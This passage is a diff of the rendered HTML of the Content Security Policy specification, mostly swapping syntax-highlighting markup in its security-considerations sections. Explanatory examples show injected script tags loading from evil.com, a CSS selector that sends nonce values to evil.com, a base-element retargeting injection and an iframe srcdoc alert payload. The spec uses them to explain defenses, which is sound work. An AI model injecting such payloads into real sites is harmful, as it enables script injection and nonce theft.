-<pre class="highlight"><c- p>&lt;</c-><c- f>p</c-><c- p>></c->Hello, [INJECTION POINT]<c- p>&lt;/</c-><c- f>p</c-><c- p>></c->
-<c- p>&lt;</c-><c- f>script</c-> <c- e>nonce</c-><c- o>=</c-><c- s>abc</c-> <c- e>src</c-><c- o>=</c-><c- s>/good.js</c-><c- p>>&lt;/</c-><c- f>script</c-><c- p>></c->
+<pre class="highlight"><span class="p">&lt;</span><span class="nt">p</span><span class="p">></span>Hello, [INJECTION POINT]<span class="p">&lt;/</span><span class="nt">p</span><span class="p">></span>
+<span class="p">&lt;</span><span class="nt">script</span> <span class="na">nonce</span><span class="o">=</span><span class="s">abc</span> <span class="na">src</span><span class="o">=</span><span class="s">/good.js</span><span class="p">>&lt;/</span><span class="nt">script</span><span class="p">></span>
 </pre>
     <p>If an attacker injects the string "<code>&lt;script src='https://evil.com/evil.js' </code>",
   then the browser will receive the following:</p>
-<pre class="highlight"><c- p>&lt;</c-><c- f>p</c-><c- p>></c->Hello, <c- p>&lt;</c-><c- f>script</c-> <c- e>src</c-><c- o>=</c-><c- s>'https://evil.com/evil.js'</c-> &lt;/<c- e>p</c-><c- p>></c->
-<c- o>&lt;</c->script nonce<c- o>=</c->abc src<c- o>=</c->/good.js><c- p>&lt;/</c-><c- f>script</c-><c- p>></c->
+<pre class="highlight"><span class="p">&lt;</span><span class="nt">p</span><span class="p">></span>Hello, <span class="p">&lt;</span><span class="nt">script</span> <span class="na">src</span><span class="o">=</span><span class="s">'https://evil.com/evil.js'</span> &lt;/<span class="na">p</span><span class="p">></span>
+<span class="o">&lt;</span>script nonce<span class="o">=</span>abc src<span class="o">=</span>/good.js><span class="p">&lt;/</span><span class="nt">script</span><span class="p">></span>
 </pre>
     <p>It will then parse that code, ending up with a <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/scripting.html#script" id="ref-for-script①①">script</a></code> element with a <code>src</code> attribute pointing to a malicious payload, an attribute named <code>&lt;/p></code>,
   an attribute named "<code>&lt;script</code>", a <code>nonce</code> attribute, and a
@@ -5374,17 +5382,17 @@ http://example.com 'strict-dynamic' 'unsafe-inline'
   not ignore duplicate attributes. If an element has a duplicate attribute any
   instance of the attribute after the first one is ignored but in the <a href="#is-element-nonceable">§6.6.3.1 Is element nonceable?</a> algorithm, all attributes including the
   duplicate ones need to be checked.</p>
-    <p class="issue" id="issue-74cb0fbd"><a class="self-link" href="#issue-74cb0fbd"></a> Currently the HTML spec’s parsing algorithm removes this information
+    <p class="issue" id="issue-a39840e8"><a class="self-link" href="#issue-a39840e8"></a> Currently the HTML spec’s parsing algorithm removes this information
   before the <a href="#is-element-nonceable">§6.6.3.1 Is element nonceable?</a> algorithm can be run which makes it
   impossible to actually detect duplicate attributes. <a href="https://github.com/whatwg/html/issues/3257">&lt;https://github.com/whatwg/html/issues/3257></a></p>
     <p>For the following example page:</p>
 <pre class="highlight">Hello, [INJECTION POINT]
-<c- p>&lt;</c-><c- f>script</c-> <c- e>nonce</c-><c- o>=</c-><c- s>abc</c-> <c- e>src</c-><c- o>=</c-><c- s>/good.js</c-><c- p>>&lt;/</c-><c- f>script</c-><c- p>></c->
+<span class="p">&lt;</span><span class="nt">script</span> <span class="na">nonce</span><span class="o">=</span><span class="s">abc</span> <span class="na">src</span><span class="o">=</span><span class="s">/good.js</span><span class="p">>&lt;/</span><span class="nt">script</span><span class="p">></span>
 </pre>
     <p>The following injected string will use a duplicate attribute to attempt to
   bypass the <a href="#is-element-nonceable">§6.6.3.1 Is element nonceable?</a> algorithm check:</p>
-<pre class="highlight">Hello, <c- p>&lt;</c-><c- f>script</c-> <c- e>src</c-><c- o>=</c-><c- s>'https://evil.com/evil.js'</c-> <c- e>x</c-><c- o>=</c-><c- s>""</c-> <c- e>x</c-><c- o>=</c->
-<c- s>&lt;script</c-> <c- e>nonce</c-><c- o>=</c-><c- s>"abcd"</c-> <c- e>src</c-><c- o>=</c-><c- s>/good.js</c-><c- p>>&lt;/</c-><c- f>script</c-><c- p>></c->
+<pre class="highlight">Hello, <span class="p">&lt;</span><span class="nt">script</span> <span class="na">src</span><span class="o">=</span><span class="s">'https://evil.com/evil.js'</span> <span class="na">x</span><span class="o">=</span><span class="s">""</span> <span class="na">x</span><span class="o">=</span>
+<span class="s">&lt;script</span> <span class="na">nonce</span><span class="o">=</span><span class="s">"abcd"</span> <span class="na">src</span><span class="o">=</span><span class="s">/good.js</span><span class="p">>&lt;/</span><span class="nt">script</span><span class="p">></span>
 </pre>
     <h4 class="heading settled" data-level="7.2.2" id="nonce-exfiltration-content-attributes"><span class="secno">7.2.2. </span><span class="content">Nonce exfiltration via content attributes</span><a class="self-link" href="#nonce-exfiltration-content-attributes"></a></h4>
     <p>Some attacks on CSP rely on the ability to exfiltrate
@@ -5392,9 +5400,9 @@ http://example.com 'strict-dynamic' 'unsafe-inline'
   CSS selectors are the best example: through clever use of
   prefix/postfix text matching selectors values can be sent out to an
   attacker’s server for reuse. Example:</p>
-<pre class="highlight"><c- f>script[nonce=a] </c-><c- p>{</c-> <c- k>background</c-><c- p>:</c-> <c- nf>url</c-><c- p>(</c-><c- s>"https://evil.com/nonce?a"</c-><c- p>);}</c->
+<pre class="highlight"><span class="nt">script[nonce=a] </span><span class="p">{</span> <span class="k">background</span><span class="p">:</span> <span class="nf">url</span><span class="p">(</span><span class="s">"https://evil.com/nonce?a"</span><span class="p">);}</span>
 </pre>
-    <p>The <code><a data-link-type="element-sub" href="https://html.spec.whatwg.org/multipage/urls-and-fetching.html#attr-nonce" id="ref-for-attr-nonce①">nonce</a></code> section talks about mitigating these types
+    <p>The <code><a data-link-type="element-sub">nonce</a></code> section talks about mitigating these types
   of attacks by hiding the nonce from the element’s content attribute and
   moving it into an internal slot. This is done to ensure that the <code>nonce</code> value is exposed to scripts but not any other non-script channels.</p>
     <h3 class="heading settled" data-level="7.3" id="security-nonce-retargeting"><span class="secno">7.3. </span><span class="content">Nonce Retargeting</span><a class="self-link" href="#security-nonce-retargeting"></a></h3>
@@ -5402,11 +5410,11 @@ http://example.com 'strict-dynamic' 'unsafe-inline'
   origin. This, generally, is fine, and desirable from the developer’s perspective. However, if an
   attacker can inject a <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/semantics.html#the-base-element" id="ref-for-the-base-element③">base</a></code> element, then an otherwise safe page can be subverted when relative
   URLs are resolved. That is, on <code>https://example.com/</code> the following code will load <code>https://example.com/good.js</code>:</p>
-<pre class="highlight"><c- p>&lt;</c-><c- f>script</c-> <c- e>nonce</c-><c- o>=</c-><c- s>abc</c-> <c- e>src</c-><c- o>=</c-><c- s>/good.js</c-><c- p>>&lt;/</c-><c- f>script</c-><c- p>></c->
+<pre class="highlight"><span class="p">&lt;</span><span class="nt">script</span> <span class="na">nonce</span><span class="o">=</span><span class="s">abc</span> <span class="na">src</span><span class="o">=</span><span class="s">/good.js</span><span class="p">>&lt;/</span><span class="nt">script</span><span class="p">></span>
 </pre>
     <p>However, the following will load <code>https://evil.com/good.js</code>:</p>
-<pre class="highlight"><c- p>&lt;</c-><c- f>base</c-> <c- e>href</c-><c- o>=</c-><c- s>"https://evil.com"</c-><c- p>></c->
-<c- p>&lt;</c-><c- f>script</c-> <c- e>nonce</c-><c- o>=</c-><c- s>abc</c-> <c- e>src</c-><c- o>=</c-><c- s>/good.js</c-><c- p>>&lt;/</c-><c- f>script</c-><c- p>></c->
+<pre class="highlight"><span class="p">&lt;</span><span class="nt">base</span> <span class="na">href</span><span class="o">=</span><span class="s">"https://evil.com"</span><span class="p">></span>
+<span class="p">&lt;</span><span class="nt">script</span> <span class="na">nonce</span><span class="o">=</span><span class="s">abc</span> <span class="na">src</span><span class="o">=</span><span class="s">/good.js</span><span class="p">>&lt;/</span><span class="nt">script</span><span class="p">></span>
 </pre>
     <p>To mitigate this risk, it is advisable to set an explicit <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/semantics.html#the-base-element" id="ref-for-the-base-element④">base</a></code> element on every page, or to
   limit the ability of an attacker to inject their own <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/semantics.html#the-base-element" id="ref-for-the-base-element⑤">base</a></code> element by setting a <a data-link-type="dfn" href="#base-uri" id="ref-for-base-uri①"><code>base-uri</code></a> directive in your page’s policy. For example, <code>base-uri 'none'</code>.</p>
@@ -5442,11 +5450,11 @@ http://example.com 'strict-dynamic' 'unsafe-inline'
   expression if the resource being loaded is the result of a
   redirect. For example, given a page with an active policy of <code><a data-link-type="dfn" href="#img-src" id="ref-for-img-src③">img-src</a> example.com example.org/path</code>:</p>
     <ul>
-     <li data-md>
+     <li data-md="">
       <p>Directly loading <code>https://example.org/not-path</code> would fail, as it doesn’t match the policy.</p>
-     <li data-md>
+     <li data-md="">
       <p>Directly loading <code>https://example.com/redirector</code> would pass, as it matches <code>example.com</code>.</p>
-     <li data-md>
+     <li data-md="">
       <p>Assuming that <code>https://example.com/redirector</code> delivered a redirect response pointing to <code>https://example.org/not-path</code>,
   the load would succeed, as the initial URL matches <code>example.com</code>,
   and the redirect target matches <code>example.org/path</code> if we ignore its path component.</p>
@@ -5464,23 +5472,23 @@ http://example.com 'strict-dynamic' 'unsafe-inline'
   policies in the <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsing-the-web.html#source-browsing-context" id="ref-for-source-browsing-context①">source browsing context</a>. The goal is to ensure that a page can’t
   bypass its policy by embedding a frame or opening a new window containing
   content that is entirely under its control (<code>srcdoc</code> documents, <code>blob:</code> or <code>data:</code> URLs, <code>about:blank</code> documents that can be manipulated via <code>document.write()</code>, etc).</p>
-    <div class="example" id="example-d8547a52">
-     <a class="self-link" href="#example-d8547a52"></a> If this would not happen a page could execute inline scripts even without <code>unsafe-inline</code> in the page’s execution context by simply embedding a <code>srcdoc</code> <code>iframe</code>. 
-<pre class="highlight"><c- p>&lt;</c-><c- f>iframe</c-> <c- e>srcdoc</c-><c- o>=</c-><c- s>"&lt;script>alert(1);&lt;/script>"</c-><c- p>>&lt;/</c-><c- f>iframe</c-><c- p>></c->
+    <div class="example" id="example-7a5b0df0">
+     <a class="self-link" href="#example-7a5b0df0"></a> If this would not happen a page could execute inline scripts even without <code>unsafe-inline</code> in the page’s execution context by simply embedding a <code>srcdoc</code> <code>iframe</code>. 
+<pre class="highlight"><span class="p">&lt;</span><span class="nt">iframe</span> <span class="na">srcdoc</span><span class="o">=</span><span class="s">"&lt;script>alert(1);&lt;/script>"</span><span class="p">>&lt;/</span><span class="nt">iframe</span><span class="p">></span>
 </pre>
     </div>
     <p>Note that we create a copy of the <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list②③">CSP list</a> which
   means that the new <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document②⓪">Document</a></code>'s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list②④">CSP list</a> is a
   snapshot of the relevant policies at its creation time. Modifications in the <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list②⑤">CSP list</a> of the new <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document②①">Document</a></code> won’t affect the <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsing-the-web.html#source-browsing-context" id="ref-for-source-browsing-context②">source browsing context</a>’s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list②⑥">CSP list</a> or vice-versa.</p>
-    <div class="example" id="example-46761516">
-     <a class="self-link" href="#example-46761516"></a> In the example below the image inside the iframe will not load because it is
+    <div class="example" id="example-3c6e0109">
+     <a class="self-link" href="#example-3c6e0109"></a> In the example below the image inside the iframe will not load because it is
     blocked by the policy in the <code>meta</code> tag of the iframe. The image outside the
     iframe will load (assuming the main page policy does not block it) since the
     policy inserted in the iframe will not affect it. 
-<pre class="highlight"><c- p>&lt;</c-><c- f>iframe</c-> <c- e>srcdoc</c-><c- o>=</c-><c- s>'&lt;meta http-equiv="Content-Security-Policy" content="img-src example.com;"></c->
-<c- s>                   &lt;img src="not-example.com/image">'</c-><c- p>>&lt;/</c-><c- f>iframe</c-><c- p>></c->
+<pre class="highlight"><span class="p">&lt;</span><span class="nt">iframe</span> <span class="na">srcdoc</span><span class="o">=</span><span class="s">'&lt;meta http-equiv="Content-Security-Policy" content="img-src example.com;"></span>
+<span class="s">                   &lt;img src="not-example.com/image">'</span><span class="p">>&lt;/</span><span class="nt">iframe</span><span class="p">></span>
 
-<c- p>&lt;</c-><c- f>img</c-> <c- e>src</c-><c- o>=</c-><c- s>"not-example.com/image"</c-><c- p>></c->
+<span class="p">&lt;</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">"not-example.com/image"</span><span class="p">></span>
 </pre>
     </div>
    </section>
@@ -5492,8 +5500,8 @@ http://example.com 'strict-dynamic' 'unsafe-inline'
   enforced or reported, according to its type. An example will help clarify how
   that ought to work in practice. The behavior of an <code>XMLHttpRequest</code> might seem unclear given a site that, for whatever reason, delivered the
   following HTTP headers:</p>
-    <div class="example" id="example-7bb4ce67">
-     <a class="self-link" href="#example-7bb4ce67"></a> 
+    <div class="example" id="example-0a519e43">
+     <a class="self-link" href="#example-0a519e43"></a> 
 <pre><a data-link-type="http-header" href="#header-content-security-policy" id="ref-for-header-content-security-policy②②">Content-Security-Policy</a>: default-src 'self' http://example.com http://example.net;
                          connect-src 'none';
 <a data-link-type="http-header" href="#header-content-security-policy" id="ref-for-header-content-security-policy②③">Content-Security-Policy</a>: connect-src http://example.com/;
@@ -5525,13 +5533,13 @@ http://example.com 'strict-dynamic' 'unsafe-inline'
     <p>If present in a <a data-link-type="dfn" href="#script-src" id="ref-for-script-src②"><code>script-src</code></a> or <a data-link-type="dfn" href="#default-src" id="ref-for-default-src④"><code>default-src</code></a> directive, it has
   two main effects:</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p><a data-link-type="grammar" href="#grammardef-host-source" id="ref-for-grammardef-host-source⑥">host-source</a> and <a data-link-type="grammar" href="#grammardef-scheme-source" id="ref-for-grammardef-scheme-source④">scheme-source</a> expressions, as well as the "<a data-link-type="grammar" href="#grammardef-unsafe-inline" id="ref-for-grammardef-unsafe-inline⑤"><code>'unsafe-inline'</code></a>"
   and "<a data-link-type="grammar" href="#grammardef-self" id="ref-for-grammardef-self③④"><code>'self'</code></a> <a data-link-type="grammar" href="#grammardef-keyword-source" id="ref-for-grammardef-keyword-source⑧">keyword-source</a>s will be
   ignored when loading script.</p>
       <p><a data-link-type="grammar" href="#grammardef-hash-source" id="ref-for-grammardef-hash-source⑧">hash-source</a> and <a data-link-type="grammar" href="#grammardef-nonce-source" id="ref-for-grammardef-nonce-source⑨">nonce-source</a> expressions
   will be honored.</p>
-     <li data-md>
+     <li data-md="">
       <p>Script requests which are triggered by non-<a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/scripting.html#parser-inserted" id="ref-for-parser-inserted③">"parser-inserted"</a> <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/scripting.html#script" id="ref-for-script①③">script</a></code> elements are allowed.</p>
     </ol>
     <p>The first change allows you to deploy "<a data-link-type="grammar" href="#grammardef-strict-dynamic" id="ref-for-grammardef-strict-dynamic⑤"><code>'strict-dynamic'</code></a> in a
@@ -5540,23 +5548,23 @@ http://example.com 'strict-dynamic' 'unsafe-inline'
     <p>The second allows scripts which are given access to the page via nonces or
   hashes to bring in their dependencies without adding them explicitly to the
   page’s policy.</p>
-    <div class="example" id="example-fe711f2d">
-     <a class="self-link" href="#example-fe711f2d"></a> Suppose MegaCorp, Inc. deploys the following policy: 
+    <div class="example" id="example-fb69436b">
+     <a class="self-link" href="#example-fb69436b"></a> Suppose MegaCorp, Inc. deploys the following policy: 
 <pre><a data-link-type="http-header" href="#header-content-security-policy" id="ref-for-header-content-security-policy②④">Content-Security-Policy</a>: <a data-link-type="dfn" href="#script-src" id="ref-for-script-src③">script-src</a> 'nonce-DhcnhD3khTMePgXwdayK9BsMqXjhguV' <a data-link-type="grammar" href="#grammardef-strict-dynamic" id="ref-for-grammardef-strict-dynamic⑥">'strict-dynamic'</a>
 </pre>
      <p>And serves the following HTML with that policy active:</p>
 <pre class="highlight">...
-<c- p>&lt;</c-><c- f>script</c-> <c- e>src</c-><c- o>=</c-><c- s>"https://cdn.example.com/script.js"</c-> <c- e>nonce</c-><c- o>=</c-><c- s>"DhcnhD3khTMePgXwdayK9BsMqXjhguVV"</c-> <c- p>>&lt;/</c-><c- f>script</c-><c- p>></c->
+<span class="p">&lt;</span><span class="nt">script</span> <span class="na">src</span><span class="o">=</span><span class="s">"https://cdn.example.com/script.js"</span> <span class="na">nonce</span><span class="o">=</span><span class="s">"DhcnhD3khTMePgXwdayK9BsMqXjhguVV"</span> <span class="p">>&lt;/</span><span class="nt">script</span><span class="p">></span>
 ...
 </pre>
      <p>This will generate a request for <code>https://cdn.example.com/script.js</code>, which
-    will not be blocked because of the matching <code><a data-link-type="element-sub" href="https://html.spec.whatwg.org/multipage/urls-and-fetching.html#attr-nonce" id="ref-for-attr-nonce②">nonce</a></code> attribute.</p>
+    will not be blocked because of the matching <code><a data-link-type="element-sub">nonce</a></code> attribute.</p>
      <p>If <code>script.js</code> contains the following code:</p>
-<pre class="highlight"><c- a>var</c-> s <c- o>=</c-> document<c- p>.</c->createElement<c- p>(</c-><c- t>'script'</c-><c- p>);</c->
-s<c- p>.</c->src <c- o>=</c-> <c- t>'https://othercdn.not-example.net/dependency.js'</c-><c- p>;</c->
-document<c- p>.</c->head<c- p>.</c->appendChild<c- p>(</c->s<c- p>);</c->
+<pre class="highlight"><span class="kd">var</span> s <span class="o">=</span> document<span class="p">.</span>createElement<span class="p">(</span><span class="s1">'script'</span><span class="p">);</span>
+s<span class="p">.</span>src <span class="o">=</span> <span class="s1">'https://othercdn.not-example.net/dependency.js'</span><span class="p">;</span>
+document<span class="p">.</span>head<span class="p">.</span>appendChild<span class="p">(</span>s<span class="p">);</span>
 
-document<c- p>.</c->write<c- p>(</c-><c- t>'&lt;scr'</c-> <c- o>+</c-> <c- t>'ipt src="/sadness.js">&lt;/scr'</c-> <c- o>+</c-> <c- t>'ipt>'</c-><c- p>);</c->
+document<span class="p">.</span>write<span class="p">(</span><span class="s1">'&lt;scr'</span> <span class="o">+</span> <span class="s1">'ipt src="/sadness.js">&lt;/scr'</span> <span class="o">+</span> <span class="s1">'ipt>'</span><span class="p">);</span>
 </pre>
      <p><code>dependency.js</code> will load, as the <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/scripting.html#script" id="ref-for-script①④">script</a></code> element created by <code>createElement()</code> is not <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/scripting.html#parser-inserted" id="ref-for-parser-inserted④">"parser-inserted"</a>.</p>
      <p><code>sadness.js</code> will <em>not</em> load, however, as <code>document.write()</code> produces <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/scripting.html#script" id="ref-for-script①⑤">script</a></code> elements which are <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/scripting.html#parser-inserted" id="ref-for-parser-inserted⑤">"parser-inserted"</a>.</p>
@@ -5578,10 +5586,10 @@ document<c- p>.</c->write<c- p>(</c-><c- t>'&lt;scr'</c-> <c- o>+</c-> <c- t>'ip
      <p>The "<a data-link-type="grammar" href="#grammardef-unsafe-hashes" id="ref-for-grammardef-unsafe-hashes②"><code>'unsafe-hashes'</code></a>" source expression aims to make
     CSP deployment simpler and safer in these situations by allowing developers
     to enable specific handlers via hashes.</p>
-     <div class="example" id="example-5d2d17c6">
-      <a class="self-link" href="#example-5d2d17c6"></a> MegaCorp, Inc. can’t quite get rid of the following HTML on anything
+     <div class="example" id="example-2d0cb638">
+      <a class="self-link" href="#example-2d0cb638"></a> MegaCorp, Inc. can’t quite get rid of the following HTML on anything
       resembling a reasonable schedule: 
-<pre class="highlight"><c- p>&lt;</c-><c- f>button</c-> <c- e>id</c-><c- o>=</c-><c- s>"action"</c-> <c- e>onclick</c-><c- o>=</c-><c- s>"doSubmit()"</c-><c- p>></c->
+<pre class="highlight"><span class="p">&lt;</span><span class="nt">button</span> <span class="na">id</span><span class="o">=</span><span class="s">"action"</span> <span class="na">onclick</span><span class="o">=</span><span class="s">"doSubmit()"</span><span class="p">></span>
 </pre>
       <p>Rather than reducing security by specifying "<code>'unsafe-inline'</code>", they decide to use
       "<code>'unsafe-hashes'</code>" along with a hash source expression, as follows:</p>
@@ -5609,8 +5617,8 @@ document<c- p>.</c->write<c- p>(</c-><c- t>'&lt;scr'</c-> <c- o>+</c-> <c- t>'ip
     fetched instead. This means that it is possible for the hash needed to whitelist
     an inline script block to be different that the hash needed to whitelist an
     external script even if they have identical contents.</p>
-     <div class="example" id="example-af80f2fd">
-      <a class="self-link" href="#example-af80f2fd"></a> MegaCorp, Inc. wishes to allow two specific scripts on a page in a way
+     <div class="example" id="example-96d3cc15">
+      <a class="self-link" href="#example-96d3cc15"></a> MegaCorp, Inc. wishes to allow two specific scripts on a page in a way
       that ensures that the content matches their expectations. They do so by
       setting the following policy: 
 <pre><a data-link-type="http-header" href="#header-content-security-policy" id="ref-for-header-content-security-policy②⑥">Content-Security-Policy</a>: script-src 'sha256-abc123' 'sha512-321cba'
@@ -5618,16 +5626,16 @@ document<c- p>.</c->write<c- p>(</c-><c- t>'&lt;scr'</c-> <c- o>+</c-> <c- t>'ip
       <p>In the presence of that policy, the following <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/scripting.html#script" id="ref-for-script①⑨">script</a></code> elements would be
       allowed to execute because they contain only integrity metadata that matches
       the policy:</p>
-<pre class="highlight"><c- p>&lt;</c-><c- f>script</c-> <c- e>integrity</c-><c- o>=</c-><c- s>"sha256-abc123"</c-> ...<c- p>>&lt;/</c-><c- f>script</c-><c- p>></c->
-<c- p>&lt;</c-><c- f>script</c-> <c- e>integrity</c-><c- o>=</c-><c- s>"sha512-321cba"</c-> ...<c- p>>&lt;/</c-><c- f>script</c-><c- p>></c->
-<c- p>&lt;</c-><c- f>script</c-> <c- e>integrity</c-><c- o>=</c-><c- s>"sha256-abc123 sha512-321cba"</c-> ...<c- p>>&lt;/</c-><c- f>script</c-><c- p>></c->
+<pre class="highlight"><span class="p">&lt;</span><span class="nt">script</span> <span class="na">integrity</span><span class="o">=</span><span class="s">"sha256-abc123"</span> ...<span class="p">>&lt;/</span><span class="nt">script</span><span class="p">></span>
+<span class="p">&lt;</span><span class="nt">script</span> <span class="na">integrity</span><span class="o">=</span><span class="s">"sha512-321cba"</span> ...<span class="p">>&lt;/</span><span class="nt">script</span><span class="p">></span>
+<span class="p">&lt;</span><span class="nt">script</span> <span class="na">integrity</span><span class="o">=</span><span class="s">"sha256-abc123 sha512-321cba"</span> ...<span class="p">>&lt;/</span><span class="nt">script</span><span class="p">></span>
 </pre>
       <p>While the following <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/scripting.html#script" id="ref-for-script②⓪">script</a></code> elements would not execute because they
       contain valid metadata that does not match the policy (even though other
       metadata does match):</p>
-<pre class="highlight"><c- p>&lt;</c-><c- f>script</c-> <c- e>integrity</c-><c- o>=</c-><c- s>"</c-><b><c- s>sha384-xyz789</c-></b><c- s>"</c-> ...<c- p>>&lt;/</c-><c- f>script</c-><c- p>></c->
-<c- p>&lt;</c-><c- f>script</c-> <c- e>integrity</c-><c- o>=</c-><c- s>"</c-><b><c- s>sha384-xyz789</c-></b><c- s> sha512-321cba"</c-> ...<c- p>>&lt;/</c-><c- f>script</c-><c- p>></c->
-<c- p>&lt;</c-><c- f>script</c-> <c- e>integrity</c-><c- o>=</c-><c- s>"sha256-abc123 </c-><b><c- s>sha384-xyz789</c-></b><c- s> sha512-321cba"</c-> ...<c- p>>&lt;/</c-><c- f>script</c-><c- p>></c->
+<pre class="highlight"><span class="p">&lt;</span><span class="nt">script</span> <span class="na">integrity</span><span class="o">=</span><span class="s">"</span><b><span class="s">sha384-xyz789</span></b><span class="s">"</span> ...<span class="p">>&lt;/</span><span class="nt">script</span><span class="p">></span>
+<span class="p">&lt;</span><span class="nt">script</span> <span class="na">integrity</span><span class="o">=</span><span class="s">"</span><b><span class="s">sha384-xyz789</span></b><span class="s"> sha512-321cba"</span> ...<span class="p">>&lt;/</span><span class="nt">script</span><span class="p">></span>
+<span class="p">&lt;</span><span class="nt">script</span> <span class="na">integrity</span><span class="o">=</span><span class="s">"sha256-abc123 </span><b><span class="s">sha384-xyz789</span></b><span class="s"> sha512-321cba"</span> ...<span class="p">>&lt;/</span><span class="nt">script</span><span class="p">></span>
 </pre>
       <p>Metadata that is not recognized (either because it’s entirely invalid, or
       because it specifies a not-yet-supported hashing algorithm) does not affect
@@ -5635,9 +5643,9 @@ document<c- p>.</c->write<c- p>(</c-><c- t>'&lt;scr'</c-> <c- o>+</c-> <c- t>'ip
       allowed to execute in the presence of the above policy, as the additional
       metadata is invalid and therefore wouldn’t allow a script whose content
       wasn’t listed explicitly in the policy to execute:</p>
-<pre class="highlight"><c- p>&lt;</c-><c- f>script</c-> <c- e>integrity</c-><c- o>=</c-><c- s>"sha256-abc123 </c-><b><c- s>sha1024-abcd</c-></b><c- s>"</c-> ...<c- p>>&lt;/</c-><c- f>script</c-><c- p>></c->
-<c- p>&lt;</c-><c- f>script</c-> <c- e>integrity</c-><c- o>=</c-><c- s>"sha512-321cba </c-><b><c- s>entirely-invalid</c-></b><c- s>"</c-> ...<c- p>>&lt;/</c-><c- f>script</c-><c- p>></c->
-<c- p>&lt;</c-><c- f>script</c-> <c- e>integrity</c-><c- o>=</c-><c- s>"sha256-abc123 </c-><b><c- s>not-a-hash-at-all</c-></b><c- s> sha512-321cba"</c-> ...<c- p>>&lt;/</c-><c- f>script</c-><c- p>></c->
+<pre class="highlight"><span class="p">&lt;</span><span class="nt">script</span> <span class="na">integrity</span><span class="o">=</span><span class="s">"sha256-abc123 </span><b><span class="s">sha1024-abcd</span></b><span class="s">"</span> ...<span class="p">>&lt;/</span><span class="nt">script</span><span class="p">></span>
+<span class="p">&lt;</span><span class="nt">script</span> <span class="na">integrity</span><span class="o">=</span><span class="s">"sha512-321cba </span><b><span class="s">entirely-invalid</span></b><span class="s">"</span> ...<span class="p">>&lt;/</span><span class="nt">script</span><span class="p">></span>
+<span class="p">&lt;</span><span class="nt">script</span> <span class="na">integrity</span><span class="o">=</span><span class="s">"sha256-abc123 </span><b><span class="s">not-a-hash-at-all</span></b><span class="s"> sha512-321cba"</span> ...<span class="p">>&lt;/</span><span class="nt">script</span><span class="p">></span>
 </pre>
      </div>
     </section>
@@ -5662,74 +5670,74 @@ document<c- p>.</c->write<c- p>(</c-><c- t>'&lt;scr'</c-> <c- o>+</c-> <c- t>'ip
     <p>The Content Security Policy Directive registry should be updated with the
   following directives and references <a data-link-type="biblio" href="#biblio-rfc7762">[RFC7762]</a>:</p>
     <dl>
-     <dt data-md><a data-link-type="dfn" href="#base-uri" id="ref-for-base-uri②"><code>base-uri</code></a>
-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#base-uri" id="ref-for-base-uri②"><code>base-uri</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-base-uri">§6.2.1 base-uri</a>)</p>
-     <dt data-md><a data-link-type="dfn" href="#child-src" id="ref-for-child-src①"><code>child-src</code></a>
-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#child-src" id="ref-for-child-src①"><code>child-src</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-child-src">§6.1.1 child-src</a>)</p>
-     <dt data-md><a data-link-type="dfn" href="#connect-src" id="ref-for-connect-src③"><code>connect-src</code></a>
-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#connect-src" id="ref-for-connect-src③"><code>connect-src</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-connect-src">§6.1.2 connect-src</a>)</p>
-     <dt data-md><a data-link-type="dfn" href="#default-src" id="ref-for-default-src⑤"><code>default-src</code></a>
-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#default-src" id="ref-for-default-src⑤"><code>default-src</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-default-src">§6.1.3 default-src</a>)</p>
-     <dt data-md><a data-link-type="dfn" href="#font-src" id="ref-for-font-src④"><code>font-src</code></a>
-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#font-src" id="ref-for-font-src④"><code>font-src</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-font-src">§6.1.4 font-src</a>)</p>
-     <dt data-md><a data-link-type="dfn" href="#form-action" id="ref-for-form-action①"><code>form-action</code></a>
-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#form-action" id="ref-for-form-action①"><code>form-action</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-form-action">§6.3.1 form-action</a>)</p>
-     <dt data-md><a data-link-type="dfn" href="#frame-ancestors" id="ref-for-frame-ancestors⑤"><code>frame-ancestors</code></a>
-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#frame-ancestors" id="ref-for-frame-ancestors⑤"><code>frame-ancestors</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-frame-ancestors">§6.3.2 frame-ancestors</a>)</p>
-     <dt data-md><a data-link-type="dfn" href="#frame-src" id="ref-for-frame-src③"><code>frame-src</code></a>
-     <dd data-md>
+     <dt data-md=""><a data-link-type="dfn" href="#frame-src" id="ref-for-frame-src③"><code>frame-src</code></a>
+     <dd data-md="">
       <p>This document (see <a href="#directive-frame-src">§6.1.5 frame-src</a>)</p>
-     <dt data-md><a data-link-type="dfn" href="#img-src" id="ref-for-img-src④"><code>img-src</code></a>
